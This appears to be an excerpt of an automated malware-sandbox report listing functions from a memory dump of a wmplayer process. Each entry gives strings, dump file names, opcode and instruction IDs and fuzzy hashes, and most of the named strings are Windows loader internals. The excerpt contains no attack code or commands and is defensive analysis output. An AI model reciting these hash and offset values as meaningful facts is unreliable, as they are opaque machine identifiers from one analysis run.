            • Instruction Fuzzy Hash: CA3126362007059FEB26DED8C880F96B7A4BB44710F1944A9ED05DF291C7B0E941C790
            Strings
            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0387127B
            • @, xrefs: 038712A5
            • BuildLabEx, xrefs: 0387130F
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
            • API String ID: 0-3051831665
            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
            • Instruction ID: 4635ca6531ac7e08b8900ba23c51f3a2025f30fc1f2abe20ebcc425b6ea0a284
            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
            • Instruction Fuzzy Hash: 6231AF7690061CABDB11EFE9CC48EAEBBBEEB85710F0044A5E914EB560D734DA05CB61
            Strings
            • minkernel\ntdll\ldrinit.c, xrefs: 038B2104
            • LdrpInitializationFailure, xrefs: 038B20FA
            • Process initialization failed with status 0x%08lx, xrefs: 038B20F3
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
            • API String ID: 0-2986994758
            • Opcode ID: fe5e8c9292fe8e60b91f3c5554723a1a0d8a52f79b48a25dca693cb524d99ce5
            • Instruction ID: c0e0ff6b640596ca071a6e31100b739d2060ad1d58aa65ab677bcf461b06411c
            • Opcode Fuzzy Hash: fe5e8c9292fe8e60b91f3c5554723a1a0d8a52f79b48a25dca693cb524d99ce5
            • Instruction Fuzzy Hash: 75F0FF74640708ABEA20E68C8C42F9A776CEB40A04F1408D4F600EB386D2A4B9108A91
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: ___swprintf_l
            • String ID: #%u
            • API String ID: 48624451-232158463
            • Opcode ID: d4e27bf87f0dc59c4d1155fa447bb575e49033d29f2f344769eacb4db14f395a
            • Instruction ID: 8314ba0e6bb7f8b0a8d37bb8876a8c3b8fb16f967e1b51cb8753c3514fbc80f7
            • Opcode Fuzzy Hash: d4e27bf87f0dc59c4d1155fa447bb575e49033d29f2f344769eacb4db14f395a
            • Instruction Fuzzy Hash: 09713CB5A0024A9FDB05DFD9D990BAEB7F8EF08704F1940A5E905EB251E734EE01CB61
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: @$@
            • API String ID: 0-149943524
            • Opcode ID: da531006d767e694d1c114e6b32df3299d9b31bf96c5e4403ad8826cf7f631ac
            • Instruction ID: 8882e674f703a811e7dd5a92fb50e3291589e51cf8f4455b793f54fe480b272f
            • Opcode Fuzzy Hash: da531006d767e694d1c114e6b32df3299d9b31bf96c5e4403ad8826cf7f631ac
            • Instruction Fuzzy Hash: D332BB745083198BDB24CF98C480B3EB7E1EF86754F1849AEF885DBA90E734D944CB52
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: `$`
            • API String ID: 0-197956300
            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
            • Instruction ID: 2d59ca1ad93ee3e0910cc56d7a4bbaf1edec67c4855c9e7b8cfb1a9e05eca2f2
            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
            • Instruction Fuzzy Hash: AEC1B0312043459FD728CFA8C841B6BFBE5AF84328F184AADF699CA290D779D505CF52
            Strings
            • RtlpResUltimateFallbackInfo Enter, xrefs: 0383A2FB
            • RtlpResUltimateFallbackInfo Exit, xrefs: 0383A309
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
            • API String ID: 0-2876891731
            • Opcode ID: a90906843236830fac01592007f416709af6b63a54920cb65e924a83fcd4ba45
            • Instruction ID: f58a7da913ced0b53f3222e12ead07d42e8552baa03ea3fd63c91ab1a1154fc0
            • Opcode Fuzzy Hash: a90906843236830fac01592007f416709af6b63a54920cb65e924a83fcd4ba45
            • Instruction Fuzzy Hash: 34419D35A04649DBDB15CFA9C840B69B7F4FF86704F1844E6EC44DB391E679D900CB92
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: .Local\$@
            • API String ID: 0-380025441
            • Opcode ID: ad63a33d2748cb377513435df05dac07908b9d970b8ee19bdf4f4f71ea2e0dab
            • Instruction ID: ad91328e7b9cc7fbe526a92f0442a0746b91124e58c075facfeea6e9b808123f
            • Opcode Fuzzy Hash: ad63a33d2748cb377513435df05dac07908b9d970b8ee19bdf4f4f71ea2e0dab
            • Instruction Fuzzy Hash: 9931A17A5087089FC321DF68D980A5BBBE8EBC5654F4809AEF595C7260DA70DD04CB93
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: MUI
            • API String ID: 0-1339004836
            • Opcode ID: f9c43cf8a3e378db077bf83529d27d1a195e8d1868ff72013323bc5a4d93f57a
            • Instruction ID: 4d3de6d75c5cb163c21434795bac5585ba81708245d893d4ba7a36c5175babc3
            • Opcode Fuzzy Hash: f9c43cf8a3e378db077bf83529d27d1a195e8d1868ff72013323bc5a4d93f57a
            • Instruction Fuzzy Hash: 38823975E002189BDB24CFE9C880BEDF7B5BF4A714F1881A9E859EB350D770A945CB90
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 37f6005300e440ff76106b56a7911663b72d6b724d5779d8cff2aa2cf5d54b46
            • Instruction ID: d198f4a254f28ee961ea63a92eed4db949d7343174e26e9554470e637b4c5567
            • Opcode Fuzzy Hash: 37f6005300e440ff76106b56a7911663b72d6b724d5779d8cff2aa2cf5d54b46
            • Instruction Fuzzy Hash: 0CA18EB5608346CFD724DFA8C480A2ABBE5BF89304F1449AEF585DB350E770E945CB92
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
            • Instruction ID: 1202c43be675574f2297d8c648883b681b436c41f59a3412064a2f97572cbd5e
            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
            • Instruction Fuzzy Hash: F1518B72604346AFD721DF98CC40FAAB7F8FB84754F0409A9BA44DB290D7B4E914CB92
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: PreferredUILanguages
            • API String ID: 0-1884656846
            • Opcode ID: 3bf0a8592b6430dcd3999ce1e5361edf957c9e9ec5571a5ea59e2712210a4d41
            • Instruction ID: c31f204f060c12ef70908ad20e3f2bdd155095dfe2c2b13f63c65b4bb5a538b4
            • Opcode Fuzzy Hash: 3bf0a8592b6430dcd3999ce1e5361edf957c9e9ec5571a5ea59e2712210a4d41
            • Instruction Fuzzy Hash: B441D336D04219ABCF12DAD8C841BEEF7F9EF86710F0501A6E911EB254D6B0DE40C7A1
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: verifier.dll
            • API String ID: 0-3265496382
            • Opcode ID: 1ab3608add30777c5a45592005008081e29df3501a9e120a4da427506f9aa99e
            • Instruction ID: 19a686add2578541b91526678bd9dd3457a244541128c086a32a984e2c9cb122
            • Opcode Fuzzy Hash: 1ab3608add30777c5a45592005008081e29df3501a9e120a4da427506f9aa99e
            • Instruction Fuzzy Hash: CB3172756007029FDB34DFA99860AB6B7F9EB49710F5980BAE609DF385E7318C80C790
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: kLsE
            • API String ID: 0-3058123920
            • Opcode ID: 796a15376236dae0e5da734a92adbc46b34f58103cd26a33acb4c95b070c163d
            • Instruction ID: 1a95bbd630c66898933d9992ca6023a15d7f92e631721005091e8b30522b6f12
            • Opcode Fuzzy Hash: 796a15376236dae0e5da734a92adbc46b34f58103cd26a33acb4c95b070c163d
            • Instruction Fuzzy Hash: AE418936509B504AE731FFE9E884B697B94AB51724F180298FC60CF1C9CBB44885C792
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: Actx
            • API String ID: 0-89312691
            • Opcode ID: 51d263b4fba2d3c4cbbe9f3ef5222b4131fee6e82a724165e241b424b3af8e11
            • Instruction ID: ad5ea18ba3d60a5cac6786c3e8c930a3cb3493328b11ab260206bd5d98fe87f0
            • Opcode Fuzzy Hash: 51d263b4fba2d3c4cbbe9f3ef5222b4131fee6e82a724165e241b424b3af8e11
            • Instruction Fuzzy Hash: B01166307055069BEB24C99D88706BAF2D5EB97268F3C85EAD451CB391D673D841C7C0
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2849b10a6e3a94615ca30e6dec950b065fa078a9a598eca4179c5d0a4beebbec
            • Instruction ID: 66081592878967289cb17bef4cb7fd59b03426401a47a773212a1732bc3fe53d
            • Opcode Fuzzy Hash: 2849b10a6e3a94615ca30e6dec950b065fa078a9a598eca4179c5d0a4beebbec
            • Instruction Fuzzy Hash: F542A275A006168FDB14EF99C4806BEF7B6FF88314B2885ADE552EB340D734E942CB90
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d71061b58c6c017f9ab68c66ba7676c77b084861489f3d6b15e0a867c76d5f2b
            • Instruction ID: 511e5ddbac62605e2d6b2e763ea02d92fc4e57c1675cae135ce58a5863c27cae
            • Opcode Fuzzy Hash: d71061b58c6c017f9ab68c66ba7676c77b084861489f3d6b15e0a867c76d5f2b
            • Instruction Fuzzy Hash: F5329F76E01219DBCF25DFA8C880BAEBBB1FF54714F1800A9E805EB391E7759901CB91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b01c246dcab430f93bc5d2ff31ac216f89da2f9bc6a9a355fdb81d8628eda965
            • Instruction ID: 642437de51cc6828594a16173d23e8aa310725ac4b4f251059a550c771de396c
            • Opcode Fuzzy Hash: b01c246dcab430f93bc5d2ff31ac216f89da2f9bc6a9a355fdb81d8628eda965
            • Instruction Fuzzy Hash: EC22CE742046558BDB2CCFA9C090772B7F1AF45304F2888DAE896CF685E73DE552CB61
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4b2af77116f3c1bf93e598d488f862817ba1ea702508c2ffdba4c1ab0c8aed00
            • Instruction ID: 82278b8e526b7730966da59012e6d1f026d8a441a25e0b210bff73cbcc3142ed
            • Opcode Fuzzy Hash: 4b2af77116f3c1bf93e598d488f862817ba1ea702508c2ffdba4c1ab0c8aed00
            • Instruction Fuzzy Hash: 98D1D775A0072A9FCF15DFE8C890ABABBE5FF84304F0846A9E915DB280E734D985C751
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 56e53d3043fe92c8a85c33ad2c6bb12012a05256b341928424f8f086b491ba92
            • Instruction ID: 7ba34e310e10ca132784bddbea13d3082229cbdce25be8986c581844f82fd36d
            • Opcode Fuzzy Hash: 56e53d3043fe92c8a85c33ad2c6bb12012a05256b341928424f8f086b491ba92
            • Instruction Fuzzy Hash: E1C18071E006159BEF28CF9AC840BAEF7B5EB55314F1882E9D815EB394D770A946CBC0
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: aecee80bb438e39a2df936cfee00da10808d64e11e0b0d31d240d419ecdb7834
            • Instruction ID: d0a0eca2f77328449ad80f7aa043ccb1084af97fcfb100bf1f31e92df36ad8bc
            • Opcode Fuzzy Hash: aecee80bb438e39a2df936cfee00da10808d64e11e0b0d31d240d419ecdb7834
            • Instruction Fuzzy Hash: 55A12A75900619AFEF12EFA8CC41BAE77B9AF45750F054094F900EF2A0D775D850CBA5
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4b67fdb555a8438c05355ba54c7dd92854d8d82d980a2779344b97231be7ca05
            • Instruction ID: d649dcf5e03270558441df4bc9d31d0f8cfdae0becf62cb7b730b612ce7979a3
            • Opcode Fuzzy Hash: 4b67fdb555a8438c05355ba54c7dd92854d8d82d980a2779344b97231be7ca05
            • Instruction Fuzzy Hash: 57C139741083418FDB64CF59C484BAAB7E5BF88304F48499EE989CB391D774EA48CF92
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 24211a1de2c32bcc1d522c06c680589c7fb1200a07a7e15e5e6487054865ba10
            • Instruction ID: 6606d7aa4be9f0ac9a663b6badfdba813e760d3a4d11d8ee83691ff704a0aa54
            • Opcode Fuzzy Hash: 24211a1de2c32bcc1d522c06c680589c7fb1200a07a7e15e5e6487054865ba10
            • Instruction Fuzzy Hash: 76A1B2B1B00B19DBDB24DFA9C990BAAB7F6FF44318F0441A9EA45DB281DB34E901C750
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 89c9f2023601be0be4df687337cb67f582485190ad2c23987f1bf26c2daafa8c
            • Instruction ID: 8d092074881fa7e700910a4aa206f408b194ff25c634230d803ca3e0df2bbf29
            • Opcode Fuzzy Hash: 89c9f2023601be0be4df687337cb67f582485190ad2c23987f1bf26c2daafa8c
            • Instruction Fuzzy Hash: AA91E435A00A198BEB24EBE8D844B7DB7A5FF84714F1A40EAE805DFA44E734E941C791
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 30379322fc5a45e68479245bd427eb0d906724220b5c2ac25176bc4c57a0370e
            • Instruction ID: c54a17d5f1253f3fffd3da88d457ad1790035b12b5c162fd3c15065c0516f622
            • Opcode Fuzzy Hash: 30379322fc5a45e68479245bd427eb0d906724220b5c2ac25176bc4c57a0370e
            • Instruction Fuzzy Hash: 6CB111756093408FD364DF68C480A5AFBE1BF89704F1849AEF999CB352D370E945CB82
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
            • Instruction ID: 25068366e0c397f6f81a6f80546ac01c4b79f729b346a68d8c630d22cc5b2bd4
            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
            • Instruction Fuzzy Hash: 33814B76E001198BEF14DE9CC9807ADFBB2FB84244F1D81AADC16EB344D635AA44CB91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0dc5b5954caeffdceee693550875a876566246c340eec715a460943e597562b5
            • Instruction ID: ce1875aa831ebe4e39a6a11676ba3a279601b2653b2b609a6bd24e843c2a02a1
            • Opcode Fuzzy Hash: 0dc5b5954caeffdceee693550875a876566246c340eec715a460943e597562b5
            • Instruction Fuzzy Hash: 0A817E75A00709AFDB21CFE8C980AEEF7BAFB88354F144469E555E7250DB30AC05CB60
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
            • Instruction ID: 7c7a8946825c25e9def464743e222479a367bb2891a095689037dbad8d359588
